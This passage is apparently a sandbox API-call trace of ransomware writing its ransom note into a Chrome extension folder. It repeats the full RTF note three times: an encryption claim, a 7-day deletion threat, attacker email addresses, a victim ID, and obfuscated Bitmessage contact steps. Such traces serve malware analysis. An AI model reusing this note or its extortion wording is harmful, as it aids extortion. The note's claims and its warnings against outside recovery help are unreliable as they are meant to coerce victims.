| out: lpBuffer=0x2462808*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.222] CloseHandle (hObject=0x2d4) returned 1 [0289.222] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\#readme_eman#.rtf")) returned 0xffffffff [0289.222] GetLastError () returned 0x2 [0289.222] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.223] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.224] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.224] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462808, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 